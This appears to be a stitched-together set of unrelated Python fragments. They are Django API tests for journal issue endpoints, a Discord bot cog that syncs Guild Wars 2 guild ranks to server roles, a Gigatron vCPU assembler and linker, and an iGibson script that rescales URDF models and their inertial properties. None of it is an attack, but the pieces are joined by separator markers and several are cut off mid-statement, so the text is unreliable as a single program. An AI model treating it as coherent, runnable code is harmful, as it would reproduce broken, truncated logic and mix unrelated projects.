response = self.app.get('/api/v2/issues/', status=401)
self.assertEqual(response.status_code, 401)
def test_thematic_titles_must_be_dict(self):
issue = modelfactories.IssueFactory.create()
modelfactories.IssueTitleFactory.create(issue=issue)
response = self.app.get('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertEqual(content.get('thematic_titles', None), {'pt': 'Bla'})
def test_thematic_titles_must_be_dict_even_if_empty(self):
issue = modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertIsInstance(content.get('thematic_titles', None), dict)
def test_list_all_by_collection(self):
collection = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(collection, self.user)
modelfactories.IssueFactory.create(journal=journal)
collection_name = collection.name
response = self.app.get('/api/v2/issues/?collection=%s' % collection_name, extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_suppl_number_filter_without_volume(self):
"""
test that create a supplement issue, with ``number``, ``suppl_text`` and empty ``volume`` fields.
then request the API, with filter ``suppl_number`` and should return the previous issue, with the correct
``suppl_number`` (= ``suppl_text``) and ``suppl_volume`` (empty).
"""
issue = modelfactories.IssueFactory.create(number='999', suppl_text='2', volume='', type='supplement')
response = self.app.get('/api/v2/issues/?suppl_number=%s' % issue.number, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
content = content['objects'][0]
self.assertEqual(content.get('suppl_number', None), issue.suppl_text)
self.assertEqual(content.get('suppl_volume', None), '')
self.assertEqual(content.get('number', None), issue.number)
self.assertEqual(content.get('volume', None), issue.volume)
def test_suppl_number_filter_with_volume(self):
"""
test that create a supplement issue, with ``number``, ``suppl_text`` and *NON* empty ``volume`` fields.
then request the API, with filter ``suppl_number`` and should return the previous issue, with the correct
``suppl_number`` (= ``suppl_text``) and ``suppl_volume`` (= ``suppl_text``).
"""
issue = modelfactories.IssueFactory.create(number='999', suppl_text='2', volume='1', type='supplement')
response = self.app.get('/api/v2/issues/?suppl_number=%s' % issue.number, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
self.assertEqual(len(content['objects']), 1)
content = content['objects'][0]
self.assertEqual(content.get('suppl_number', None), issue.suppl_text)
self.assertEqual(content.get('suppl_volume', None), issue.suppl_text)
self.assertEqual(content.get('number', None), issue.number)
self.assertEqual(content.get('volume', None), issue.volume)
def test_suppl_volume_filter_without_number(self):
"""
test that create a supplement issue, with ``volume``, ``suppl_text`` and empty ``number`` fields.
then request the API, with filter ``suppl_number`` and should return the previous issue, with the correct
``suppl_volume`` (= ``suppl_text``) and ``suppl_number`` (empty).
"""
issue = modelfactories.IssueFactory.create(volume='999', suppl_text='2', number='', type='supplement')
response = self.app.get('/api/v2/issues/?suppl_volume=%s' % issue.volume, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
self.assertEqual(len(content['objects']), | |
<filename>guildwars2/guild/sync.py
import asyncio
import discord
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
from ..exceptions import APIError, APIForbidden, APIKeyError, APINotFound
class SyncGuild:
@commands.guild_only()
@commands.has_permissions(administrator=True)
@commands.group(name="guildsync")
async def guildsync(self, ctx):
"""In game guild rank to discord roles synchronization commands
This grou= allows you to set up a link between your ingame roster and discord.
When enabled, new roles will be created for each of your ingame ranks,
and ingame members are periodically synced to have the
correct role in discord."""
if ctx.invoked_subcommand is None:
await self.bot.send_cmd_help(ctx)
async def clearsync(self, ctx):
doc = await self.bot.database.get_guild(ctx.guild, self)
ranks = doc["sync"].get("ranks")
for rank in ranks:
roleobject = discord.utils.get(ctx.guild.roles, id=ranks[rank])
try:
await roleobject.delete()
except discord.Forbidden:
await ctx.send(
"Don't have permission to delete {0}".format(rank))
except AttributeError:
# role doesn't exist anymore?
pass
await self.bot.database.set_guild(ctx.guild, {
"sync.ranks": {},
"sync.leader": None,
"sync.setupdone": False,
"sync.on": False,
"sync.guildrole": False,
"sync.name": None,
"sync.gid": None
}, self)
@guildsync.command(name="clear")
async def sync_clear(self, ctx):
"""Wipes settings and created roles and turns sync off."""
doc = await self.bot.database.get_guild(ctx.guild, self)
enabled = self.sync_enabled(doc)
if not enabled:
return await ctx.send("No settings to clear.")
await self.clearsync(ctx)
await ctx.send("Your settings have been wiped, created roles deleted"
" and sync disabled.")
@guildsync.command(name="setup")
async def sync_setup(self, ctx):
"""Setup process for ingame ranks to discord member roles sync"""
def check(m):
return m.author == ctx.author and m.channel == ctx.channel
if not ctx.guild.me.guild_permissions.manage_roles:
await ctx.send(
"I require the 'Manage Roles' permission to do this.")
return
doc = await self.bot.database.get_guild(ctx.guild, self)
if not doc:
await self.bot.database.set_guild(
ctx.guild, {"sync.on": False,
"sync.setupdone": False}, self)
doc = await self.bot.database.get_guild(ctx.guild, self)
enabled = self.sync_enabled(doc)
if enabled:
message = await ctx.send(
"You have already ran setup on this guild before, continuing "
"will reset existing settings and delete previously "
"created roles, reply Yes to confirm.")
try:
answer = await self.bot.wait_for(
"message", timeout=30, check=check)
except asyncio.TimeoutError:
return await message.edit(content="No response in time")
if answer.content.lower() != "yes":
return
else:
await self.clearsync(ctx)
message = await ctx.send(
"Please type the name of the in-game guild you want to sync "
"to into the chat now. Please ensure you respond with it "
"exactly as it is in-game.")
try:
answer = await self.bot.wait_for(
"message", timeout=30, check=check)
except asyncio.TimeoutError:
return await message.edit(content="No response in time")
scopes = ["guilds"]
endpoint_id = "guild/search?name=" + answer.content.replace(' ', '%20')
try:
guild_id = await self.call_api(endpoint_id)
guild_id = guild_id[0]
endpoints = [
"guild/{}/members".format(guild_id),
"guild/{}/ranks".format(guild_id), "guild/{}".format(guild_id)
]
results, ranks, info = await self.call_multiple(
endpoints, ctx.author, scopes)
except (IndexError, APINotFound):
return await ctx.send("Invalid guild name")
except APIForbidden:
return await ctx.send(
"You need to have guild leader permissions ingame to be able "
"to use this synchronization.")
except APIKeyError:
return await ctx.send(
"You need to add an API key to your account first.")
except APIError as e:
return await self.error_handler(ctx, e)
roles = {}
for rank in ranks:
try:
role = await ctx.guild.create_role(
name=rank["id"],
reason="GW2Bot Sync Role [$guildsync]",
color=discord.Color(self.embed_color))
roles[rank["id"]] = role.id
except discord.Forbidden:
return await ctx.send(
"Couldn't create role {0}".format(rank["name"]))
await self.bot.database.set_guild(ctx.guild, {
"sync.ranks":
roles,
"sync.leader":
ctx.author.id,
"sync.setupdone":
True,
"sync.on":
True,
"sync.guildrole":
False,
"sync.name":
"[{0}]".format(info['tag']),
"sync.gid":
guild_id
}, self)
guidelines = (
"Guild sync requires leader permissions in game\n"
"Guild sync is tied to your account. If you remove your API key, "
"guild sync will break\n"
"**Always ensure that GW2Bot is above the synced roles, or the "
"bot won't be able to assign them**\n"
"You can modify and change permissions of the roles created by "
"the bot.\n"
"Only server members with API key added to the bot will "
"participate in the sync, and no input is required from them. "
"New members which add their API key after sync is "
"setup will also be synced automatically.\n"
"Guild sync isn't instant - it can take even 30 minutes before "
"your settings are synced. To force a sync, you can use "
"**guildsync now**\n")
await ctx.send(
"Setup complete, you can toggle the synchronization on and off "
"at any time with $guildsync toggle on/off. Now, some guidelines. "
"In case of issues, refer to this message - you can also find it "
"on the website https://gw2bot.info under FAQ")
await ctx.send(guidelines)
doc = await self.bot.database.get_guild(ctx.guild)
await self.sync_guild_ranks(doc, True)
@guildsync.command(name="toggle")
async def sync_toggle(self, ctx, on_off: bool):
"""Toggles synchronization on/off - does not wipe settings"""
doc = await self.bot.database.get_guild(ctx.guild, self)
enabled = self.sync_enabled(doc)
if not enabled:
await ctx.send(
"You need to run setup before you can toggle synchronization")
return
await self.bot.database.set_guild(ctx.guild, {"sync.on": on_off}, self)
if on_off:
msg = ("Synchronization enabled.")
else:
msg = ("Synchronization disabled.")
await ctx.send(msg)
@guildsync.command(name="guildrole")
async def guildrole_toggle(self, ctx, on_off: bool):
"""Adds a new role based on the guild tag for channel management."""
doc = await self.bot.database.get_guild(ctx.guild, self)
guilddoc = doc["sync"]
guild = self.bot.get_guild(doc["_id"])
enabled = self.sync_enabled(doc)
if not enabled:
await ctx.send(
"You need to run setup before you can toggle the guild role.")
return
# Find and create name if key doesn't exist.
if "name" not in guilddoc:
info = await self.call_api("guild/{0}".format(guilddoc["gid"]))
guilddoc["name"] = "[{0}]".format(info['tag'])
await self.bot.database.set_guild(
guild, {"sync.name": guilddoc["name"]}, self)
await self.bot.database.set_guild(ctx.guild,
{"sync.guildrole": on_off}, self)
if on_off:
# Create role if not enabled already.
if not guilddoc["guildrole"]:
try:
role = await ctx.guild.create_role(
name=guilddoc["name"],
reason="GW2Bot Sync Role [$guildsync]",
color=discord.Color(self.embed_color))
guilddoc["ranks"][guilddoc["name"]] = role.id
except discord.Forbidden:
return await ctx.send(
"Couldn't create role {0}".format(guilddoc["name"]))
await self.bot.database.set_guild(
guild, {"sync.ranks": guilddoc["ranks"]}, self)
msg = ("Guild role enabled and created. Guild sync needs to "
"run for members to be synced to the role.")
else:
# Force sync
doc = await self.bot.database.get_guild(ctx.guild)
await self.sync_guild_ranks(doc)
msg = ("Guild role disabled and cleared.")
await ctx.send(msg)
@guildsync.command(name="now")
@commands.cooldown(1, 60, BucketType.user)
async def sync_now(self, ctx):
"""Force a synchronization, also deletes or creates new ranks as needed."""
doc = await self.bot.database.get_guild(ctx.guild, self)
enabled = self.sync_enabled(doc)
if not enabled:
return await ctx.send(
"You need to run setup before you can synchronize.")
await ctx.trigger_typing()
doc = await self.bot.database.get_guild(ctx.guild)
await self.sync_guild_ranks(doc)
await ctx.send("Done.")
async def getmembers(self, leader, guild_id):
scopes = ["guilds"]
try:
endpoint = "guild/{}/members".format(guild_id)
results = await self.call_api(endpoint, leader, scopes)
return results
except Exception as e:
return None
async def add_member_to_role(self, role, member, guild):
try:
await member.add_roles(
role, reason="GW2Bot Integration [$guildsync]")
except discord.Forbidden:
self.log.debug("Permissions error when trying to "
"give {0} role to {1} user "
"in {2} server.".format(role.name, member.name,
guild.name))
return None
except AttributeError:
# role no longer exists - deleted?
return None
async def sync_guild_ranks(self, doc, initial=False):
name = self.__class__.__name__
guilddoc = doc["cogs"][name]["sync"]
enabled = guilddoc.get("on", False)
guildrole = guilddoc["name"] if guilddoc.get("guildrole",
False) else None
if not enabled:
return
guild = self.bot.get_guild(doc["_id"])
if guild is None:
return
savedranks = guilddoc["ranks"]
gid = guilddoc["gid"]
endpoint = "guild/{0}/ranks".format(gid)
lid = guilddoc["leader"]
scopes = ["guilds"]
leader = await self.bot.get_user_info(lid)
currentranks = []
existingranks = []
newranks = []
newsaved = {}
if not initial:
if len(guild.roles) <= 1:
return
try:
ranks = await self.call_api(endpoint, leader, scopes)
except APIError:
return
# Add guildrole to allowed ranks
if guildrole:
ranks.append({'id': guildrole})
for rank in ranks:
try:
discordrole = discord.utils.get(
guild.roles, id=guilddoc["ranks"][rank["id"]])
if discordrole:
existingranks.append(discordrole)
newsaved[rank["id"]] = discordrole.id
else:
newranks.append(rank["id"])
except KeyError:
newranks.append(rank["id"])
for role_id in savedranks.values():
discordrole = discord.utils.get(guild.roles, id=role_id)
currentranks.append(discordrole)
todelete = set(currentranks) - set(existingranks)
for rank in todelete:
try:
await rank.delete()
except discord.Forbidden:
pass
except AttributeError:
pass
for role in newranks:
newrole = await guild.create_role(
name=role,
reason="GW2Bot Sync Role [$guildsync]",
color=discord.Color(self.embed_color))
newsaved[role] = newrole.id
guilddoc["ranks"] = newsaved
await self.bot.database.set_guild(guild, {"sync.ranks": newsaved},
self)
gw2members = await self.getmembers(leader, gid)
rolelist = []
if guildrole:
guildrole = discord.utils.get(
guild.roles, id=guilddoc["ranks"][guildrole])
for role_id in newsaved.values():
discordrole = discord.utils.get(guild.roles, id=role_id)
rolelist.append(discordrole)
if gw2members is not None:
for member in guild.members:
rank = None
try:
keydoc = await self.fetch_key(member)
name = keydoc["account_name"]
for gw2user in gw2members:
if gw2user["name"] == name:
rank = gw2user["rank"]
if rank:
try:
desiredrole = discord.utils.get(
guild.roles, id=guilddoc["ranks"][rank])
if desiredrole not in member.roles:
for role in rolelist:
try:
await member.remove_roles(
role,
reason=
"GW2Bot Integration [$guildsync]")
except discord.Forbidden:
self.log.debug(
"Permissions error when trying to "
"remove {0} role from {1} "
| |
from copy import copy
from re import findall
import sys
global_labels = {
'vPC': 0x0016,
'vAC': 0x0018,
'vACH': 0x0019,
'vLR': 0x001a,
'vLRH': 0x001b,
'sysFn': 0x0022,
'r1': 0x0030,
'r2': 0x0032,
'r3': 0x0034,
'r4': 0x0036,
'r5': 0x0038,
'r6': 0x003a,
'r7': 0x003c,
'r8': 0x003e,
'r9': 0x0040,
'r10': 0x0042,
'r11': 0x0044,
'r12': 0x0046,
'r13': 0x0048,
'r14': 0x004a,
'r15': 0x004c,
'SYS_LSRW1_48' : 0x0600,
}
class Log:
def __init__(self, f):
self.f = f
log = Log(sys.stderr)
class Segment:
def __init__(self, address, size):
self.address = address
self.size = size
self.buffer = bytearray()
self.relocs = {}
def pc(self):
return self.address + len(self.buffer)
def remaining(self):
return self.size - len(self.buffer)
def emit(self, data):
assert(len(self.buffer) + len(data) <= self.size)
self.buffer += data
def emitb(self, opcode, operand):
assert(operand >= -128 and operand < 256)
self.emit(bytes([opcode, operand]))
def emitw(self, opcode, operand):
assert(operand >= -32768 and operand < 65536)
self.emit(bytes([opcode, operand & 0xff, (operand >> 8) & 0xff]))
def reloc(self, addr, symbol):
assert(addr >= self.address and addr < self.address + self.size)
self.relocs[addr - self.address] = symbol
def write(self, stream):
if len(self.buffer) != 0:
print(f'writing segment {self.address:x}:{self.pc():x}', file=log.f)
stream.write(bytes([self.address >> 8 & 0xff, self.address & 0xff, len(self.buffer) & 0xff]))
stream.write(self.buffer)
def prev(address, step=2):
"""Subtract 2 while staying in the same page
This is needed for target calculations because vCPU always
increments [vPC] by 2 *before* fetching the next opcode."""
return (address & 0xff00) | ((address - step) & 0x00ff)
class Inst:
def __init__(self, opcode, operand, size, branch, emit):
self.addr = None
self.opcode = opcode
self.operand = operand
self.size = size
self.branch = branch
self._emit = emit
def emit(self, segment):
self._emit(self, segment)
def emitjcc(self, segment, near, far):
# 'near' is the condition code for local branches, 'far' is its inverse condition
if self.operand & 0xff00 != self.addr & 0xff00:
# far jump
assert(self.size == 8)
print(f'emitting far branch from {self.addr:x} to {self.operand:x}', file=log.f)
skip = prev(self.addr, step=2-8);
segment.emit(bytes([0x35, far, skip & 0xff])) # BCC <far> <skip>
segment.emitw(0x11, prev(self.operand)) # LDWI <target>
segment.emitb(0xf3, global_labels['pvpc']) # DOKE pvpc
else:
# near jump
assert(self.size == 3)
print(f'emitting near branch from {self.addr:x} to {self.operand:x}', file=log.f)
segment.emit(bytes([0x35, near, prev(self.operand) & 0xff]))# BCC <near> <target>
def emitj(self, segment):
if self.operand & 0xff00 == self.addr & 0xff00:
print(f'emitting near jump from {self.addr:x} to {self.operand:x}', file=log.f)
segment.emitb(0x90, prev(self.operand) & 0xff) # BRA <target>
else:
print(f'emitting far jump from {self.addr:x} to {self.operand:x}', file=log.f)
Inst.ldwi(prev(self.operand)).emit(segment)
segment.emitb(0xf3, global_labels['pvpc']) # DOKE pvpc
@staticmethod
def glob(name): return Inst('glob', name, 0, False, lambda i, s: None)
@staticmethod
def label(name): return Inst('label', name, 0, False, lambda i, s: None)
@staticmethod
def ldwi(con): return Inst('ldwi', con, 3, False, lambda i, s: s.emitw(0x11, i.operand))
@staticmethod
def ld(d): return Inst('ld', d, 2, False, lambda i, s: s.emitb(0x1a, i.operand))
@staticmethod
def ldw(d): return Inst('ldw', d, 2, False, lambda i, s: s.emitb(0x21, i.operand))
@staticmethod
def stw(d): return Inst('stw', d, 2, False, lambda i, s: s.emitb(0x2b, i.operand))
@staticmethod
def ldlw(d): return Inst('ldlw', d, 2, False, lambda i, s: s.emitb(0xee, i.operand))
@staticmethod
def stlw(d): return Inst('stlw', d, 2, False, lambda i, s: s.emitb(0xec, i.operand))
@staticmethod
def alloc(d): return Inst('alloc', d, 2, False, lambda i, s: s.emitb(0xdf, i.operand))
@staticmethod
def jeq(l): return Inst('jeq', l, 8, True, lambda i, s: i.emitjcc(s, 0x3f, 0x72))
@staticmethod
def jne(l): return Inst('jne', l, 8, True, lambda i, s: i.emitjcc(s, 0x72, 0x3f))
@staticmethod
def jge(l): return Inst('jge', l, 8, True, lambda i, s: i.emitjcc(s, 0x53, 0x50))
@staticmethod
def jgt(l): return Inst('jgt', l, 8, True, lambda i, s: i.emitjcc(s, 0x4d, 0x56))
@staticmethod
def jle(l): return Inst('jle', l, 8, True, lambda i, s: i.emitjcc(s, 0x56, 0x4d))
@staticmethod
def jlt(l): return Inst('jlt', l, 8, True, lambda i, s: i.emitjcc(s, 0x50, 0x53))
@staticmethod
def ldi(con): return Inst('ldi', con, 2, False, lambda i, s: s.emitb(0x59, i.operand))
@staticmethod
def st(d): return Inst('st', d, 2, False, lambda i, s: s.emitb(0x5e, i.operand))
@staticmethod
def pop(): return Inst('pop', None, 1, False, lambda i, s: s.emit(bytes([0x63])))
@staticmethod
def popret(): return Inst('popret', None, 2, False, lambda i, s: s.emit(bytes([0x63, 0xff])))
@staticmethod
def push(): return Inst('push', None, 1, False, lambda i, s: s.emit(bytes([0x75])))
@staticmethod
def lup(d): return Inst('lup', d, 2, False, lambda i, s: s.emitb(0x7f, i.operand))
@staticmethod
def andi(con): return Inst('andi', con, 2, False, lambda i, s: s.emitb(0x82, i.operand))
@staticmethod
def ori(con): return Inst('ori', con, 2, False, lambda i, s: s.emitb(0x88, i.operand))
@staticmethod
def xori(con): return Inst('xori', con, 2, False, lambda i, s: s.emitb(0x8c, i.operand))
@staticmethod
def j(l): return Inst('j', l, 5, False, lambda i, s: i.emitj(s))
@staticmethod
def jr(): return Inst('jr', None, 2, False, lambda i, s: s.emitb(0xf3, global_labels['pvpc']))
@staticmethod
def inc(d): return Inst('inc', d, 2, False, lambda i, s: s.emitb(0x93, i.operand))
@staticmethod
def addw(d): return Inst('addw', d, 2, False, lambda i, s: s.emitb(0x99, i.operand))
@staticmethod
def peek(): return Inst('peek', None, 1, False, lambda i, s: s.emit(bytes([0xad])))
@staticmethod
def sys(con): return Inst('sys', con, 2, False, lambda i, s: s.emitb(0xb4, i.operand))
@staticmethod
def subw(d): return Inst('subw', d, 2, False, lambda i, s: s.emitb(0xb8, i.operand))
@staticmethod
def call(d): return Inst('call', d, 2, False, lambda i, s: s.emitb(0xcf, i.operand))
@staticmethod
def addi(con): return Inst('addi', con, 2, False, lambda i, s: s.emitb(0xe3, i.operand))
@staticmethod
def subi(con): return Inst('subi', con, 2, False, lambda i, s: s.emitb(0xe6, i.operand))
@staticmethod
def lslw(): return Inst('lslw', None, 1, False, lambda i, s: s.emit(bytes([0xe9])))
@staticmethod
def poke(d): return Inst('poke', d, 2, False, lambda i, s: s.emitb(0xf0, i.operand))
@staticmethod
def doke(d): return Inst('doke', d, 2, False, lambda i, s: s.emitb(0xf3, i.operand))
@staticmethod
def deek(): return Inst('deek', None, 1, False, lambda i, s: s.emit(bytes([0xf6])))
@staticmethod
def andw(d): return Inst('andw', d, 2, False, lambda i, s: s.emitb(0xf8, i.operand))
@staticmethod
def orw(d): return Inst('orw', d, 2, False, lambda i, s: s.emitb(0xfa, i.operand))
@staticmethod
def xorw(d): return Inst('xorw', d, 2, False, lambda i, s: s.emitb(0xfc, i.operand))
@staticmethod
def ret(): return Inst('ret', None, 1, False, lambda i, s: s.emit(bytes([0xff])))
@staticmethod
def db(con): return Inst('db', con, 1, False, lambda i, s: s.emit(bytes([i.operand])))
@staticmethod
def dw(con): return Inst('dw', con, 2, False, lambda i, s: s.emit(bytes([i.operand & 0xff, (i.operand >> 8) & 0xff])))
@staticmethod
def dx(x): return Inst('dx', x, len(x), False, lambda i, s: s.emit(bytes(x)))
@staticmethod
def dc(l): return Inst('dc', l, 2, False, lambda i, s: s.emit(bytes([prev(i.operand) & 0xff, prev(i.operand) >> 8])))
@staticmethod
def dl(l): return Inst('dl', l, sum([i.size for i in l]), False, None)
functions = {}
func = None
def defun(name):
global func
func = []
functions[name] = func
def glob(name): func.append(Inst.glob(name))
def label(name): func.append(Inst.label(name))
def ldwi(con): func.append(Inst.ldwi(con))
def ld(d): func.append(Inst.ld(d))
def ldw(d): func.append(Inst.ldw(d))
def stw(d): func.append(Inst.stw(d))
def ldlw(d): func.append(Inst.ldlw(d))
def stlw(d): func.append(Inst.stlw(d))
def alloc(d): func.append(Inst.alloc(d))
def jeq(l): func.append(Inst.jeq(l))
def jne(l): func.append(Inst.jne(l))
def jge(l): func.append(Inst.jge(l))
def jgt(l): func.append(Inst.jgt(l))
def jle(l): func.append(Inst.jle(l))
def jlt(l): func.append(Inst.jlt(l))
def ldi(con): func.append(Inst.ldi(con))
def st(d): func.append(Inst.st(d))
def pop(): func.append(Inst.pop())
def popret(): func.append(Inst.popret())
def push(): func.append(Inst.push())
def lup(d): func.append(Inst.lup(d))
def andi(con): func.append(Inst.andi(con))
def ori(con): func.append(Inst.ori(con))
def xori(con): func.append(Inst.xori(con))
def j(l): func.append(Inst.j(l))
def jr():
# Check for a preceding ldwi. If one exists, snip it out and create a 'j' instead of a 'jr'.
if len(func) > 0 and func[len(func)-1].opcode == 'ldwi':
func[len(func)-1] = Inst.j(func[len(func)-1].operand)
else:
func.append(Inst.jr())
def inc(d): func.append(Inst.inc(d))
def addw(d): func.append(Inst.addw(d))
def peek(): func.append(Inst.peek())
def sys(con): func.append(Inst.sys(con))
def subw(d): func.append(Inst.subw(d))
def call(d): func.append(Inst.call(d))
def addi(con): func.append(Inst.addi(con))
def subi(con): func.append(Inst.subi(con))
def lslw(): func.append(Inst.lslw())
def poke(d): func.append(Inst.poke(d))
def doke(d): func.append(Inst.doke(d))
def deek(): func.append(Inst.deek())
def andw(d): func.append(Inst.andw(d))
def orw(d): func.append(Inst.orw(d))
def xorw(d): func.append(Inst.xorw(d))
def ret(): func.append(Inst.ret())
def db(con): func.append(Inst.db(con))
def dw(con): func.append(Inst.dw(con))
def dx(x): func.append(Inst.dx(x))
def dc(l): func.append(Inst.dc(l))
def link(entry, outf, logf):
log.f = logf
# Before laying out any functions, garbage collect those that are not used.
marked = {'@globals', '@thunk0', '@thunk1', '@thunk2', entry}
for name, func in functions.items():
if name == '@globals':
continue
labels = set()
for inst in func:
if inst.opcode == 'label' or inst.opcode == 'glob':
labels.add(inst.operand)
elif type(inst.operand) is str and inst.operand not in labels:
marked.add(inst.operand)
for name in list(functions.keys()):
if name[0] == '@':
if name not in marked and name[1:] not in marked:
print(f'removing function {name}', file=log.f)
functions[name] = []
elif name not in marked:
print(f'removing function {name}', file=log.f)
del functions[name]
# After garbage collection, coalesce adjacent data instructions into contiguous lists. This is necessary in
# order to avoid arrays being split across segment discontinuities.
for name, func in functions.items():
result = []
coalesced = None
for inst in func:
if inst.opcode in { 'db', 'dw', 'dx', 'dc' }:
if coalesced is None:
coalesced | |
import json
import os
import xml.etree.ElementTree as ET
import numpy as np
import pybullet as p
import trimesh
from IPython import embed
from PIL import Image
import igibson
from igibson.external.pybullet_tools.utils import get_center_extent, stable_z_on_aabb
from igibson.objects.articulated_object import ArticulatedObject
from igibson.objects.visual_marker import VisualMarker
from igibson.scenes.empty_scene import EmptyScene
from igibson.simulator import Simulator
from igibson.utils.urdf_utils import round_up, save_urdfs_without_floating_joints
from igibson.utils.utils import rotate_vector_3d
SELECTED_CLASSES = ["window"]
SELECTED_INSTANCES = "103070"
def save_scaled_urdf(filename, avg_size_mass, obj_class):
model_path = os.path.dirname(filename)
meta_json = os.path.join(model_path, "misc/metadata.json")
if os.path.isfile(meta_json):
with open(meta_json, "r") as f:
meta_data = json.load(f)
bbox_size = np.array(meta_data["bbox_size"])
base_link_offset = np.array(meta_data["base_link_offset"])
else:
bbox_json = os.path.join(model_path, "misc/bbox.json")
with open(bbox_json, "r") as bbox_file:
bbox_data = json.load(bbox_file)
bbox_max = np.array(bbox_data["max"])
bbox_min = np.array(bbox_data["min"])
bbox_size = bbox_max - bbox_min
base_link_offset = (bbox_min + bbox_max) / 2.0
bounding_box = np.array(avg_size_mass["size"])
scale = bounding_box / bbox_size
# scale = np.array([1.0, 1.0, 1.0])
object_tree = ET.parse(filename)
# We need to scale 1) the meshes, 2) the position of meshes, 3) the position of joints, 4) the orientation axis of joints
# The problem is that those quantities are given wrt. its parent link frame, and this can be rotated wrt. the frame the scale was given in
# Solution: parse the kin tree joint by joint, extract the rotation, rotate the scale, apply rotated scale to 1, 2, 3, 4 in the child link frame
# First, define the scale in each link reference frame
# and apply it to the joint values
scales_in_lf = {}
scales_in_lf["base_link"] = scale
all_processed = False
while not all_processed:
all_processed = True
for joint in object_tree.iter("joint"):
parent_link_name = joint.find("parent").attrib["link"]
child_link_name = joint.find("child").attrib["link"]
if parent_link_name in scales_in_lf and child_link_name not in scales_in_lf:
scale_in_parent_lf = scales_in_lf[parent_link_name]
# The location of the joint frame is scaled using the scale in the parent frame
for origin in joint.iter("origin"):
current_origin_xyz = np.array([float(val) for val in origin.attrib["xyz"].split(" ")])
new_origin_xyz = np.multiply(current_origin_xyz, scale_in_parent_lf)
new_origin_xyz = np.array([round_up(val, 4) for val in new_origin_xyz])
origin.attrib["xyz"] = " ".join(map(str, new_origin_xyz))
# scale the prismatic joint
if joint.attrib["type"] == "prismatic":
limits = joint.findall("limit")
assert len(limits) == 1
limit = limits[0]
axes = joint.findall("axis")
assert len(axes) == 1
axis = axes[0]
axis_np = np.array([float(elem) for elem in axis.attrib["xyz"].split()])
major_axis = np.argmax(np.abs(axis_np))
# assume the prismatic joint is roughly axis-aligned
limit.attrib["upper"] = str(float(limit.attrib["upper"]) * scale_in_parent_lf[major_axis])
limit.attrib["lower"] = str(float(limit.attrib["lower"]) * scale_in_parent_lf[major_axis])
# Get the rotation of the joint frame and apply it to the scale
if "rpy" in joint.keys():
joint_frame_rot = np.array([float(val) for val in joint.attrib["rpy"].split(" ")])
# Rotate the scale
scale_in_child_lf = rotate_vector_3d(scale_in_parent_lf, *joint_frame_rot, cck=True)
scale_in_child_lf = np.absolute(scale_in_child_lf)
else:
scale_in_child_lf = scale_in_parent_lf
# print("Adding: ", joint.find("child").attrib["link"])
scales_in_lf[joint.find("child").attrib["link"]] = scale_in_child_lf
# The axis of the joint is defined in the joint frame, we scale it after applying the rotation
for axis in joint.iter("axis"):
current_axis_xyz = np.array([float(val) for val in axis.attrib["xyz"].split(" ")])
new_axis_xyz = np.multiply(current_axis_xyz, scale_in_child_lf)
new_axis_xyz /= np.linalg.norm(new_axis_xyz)
new_axis_xyz = np.array([round_up(val, 4) for val in new_axis_xyz])
axis.attrib["xyz"] = " ".join(map(str, new_axis_xyz))
# Iterate again the for loop since we added new elements to the dictionary
all_processed = False
all_links = object_tree.findall("link")
all_links_trimesh = []
total_volume = 0.0
for link in all_links:
meshes = link.findall("collision/geometry/mesh")
if len(meshes) == 0:
all_links_trimesh.append(None)
continue
assert len(meshes) == 1, (filename, link.attrib["name"])
collision_mesh_path = os.path.join(model_path, meshes[0].attrib["filename"])
trimesh_obj = trimesh.load(file_obj=collision_mesh_path)
all_links_trimesh.append(trimesh_obj)
volume = trimesh_obj.volume
if link.attrib["name"] == "base_link":
if obj_class in ["lamp"]:
volume *= 10.0
total_volume += volume
# Scale the mass based on bounding box size
# TODO: how to scale moment of inertia?
total_mass = avg_size_mass["density"] * bounding_box[0] * bounding_box[1] * bounding_box[2]
print("total_mass", total_mass)
density = total_mass / total_volume
print("avg density", density)
for trimesh_obj in all_links_trimesh:
if trimesh_obj is not None:
trimesh_obj.density = density
assert len(all_links) == len(all_links_trimesh)
# Now iterate over all links and scale the meshes and positions
for link, link_trimesh in zip(all_links, all_links_trimesh):
inertials = link.findall("inertial")
if len(inertials) == 0:
inertial = ET.SubElement(link, "inertial")
else:
assert len(inertials) == 1
inertial = inertials[0]
masses = inertial.findall("mass")
if len(masses) == 0:
mass = ET.SubElement(inertial, "mass")
else:
assert len(masses) == 1
mass = masses[0]
inertias = inertial.findall("inertia")
if len(inertias) == 0:
inertia = ET.SubElement(inertial, "inertia")
else:
assert len(inertias) == 1
inertia = inertias[0]
origins = inertial.findall("origin")
if len(origins) == 0:
origin = ET.SubElement(inertial, "origin")
else:
assert len(origins) == 1
origin = origins[0]
if link_trimesh is not None:
if link.attrib["name"] == "base_link":
if obj_class in ["lamp"]:
link_trimesh.density *= 10.0
if link_trimesh.is_watertight:
center = link_trimesh.center_mass
else:
center = link_trimesh.centroid
# The inertial frame origin will be scaled down below.
# Here, it has the value BEFORE scaling
origin.attrib["xyz"] = " ".join(map(str, center))
origin.attrib["rpy"] = " ".join(map(str, [0.0, 0.0, 0.0]))
mass.attrib["value"] = str(round_up(link_trimesh.mass, 4))
moment_of_inertia = link_trimesh.moment_inertia
inertia.attrib["ixx"] = str(moment_of_inertia[0][0])
inertia.attrib["ixy"] = str(moment_of_inertia[0][1])
inertia.attrib["ixz"] = str(moment_of_inertia[0][2])
inertia.attrib["iyy"] = str(moment_of_inertia[1][1])
inertia.attrib["iyz"] = str(moment_of_inertia[1][2])
inertia.attrib["izz"] = str(moment_of_inertia[2][2])
else:
# empty link that does not have any mesh
origin.attrib["xyz"] = " ".join(map(str, [0.0, 0.0, 0.0]))
origin.attrib["rpy"] = " ".join(map(str, [0.0, 0.0, 0.0]))
mass.attrib["value"] = str(0.0)
inertia.attrib["ixx"] = str(0.0)
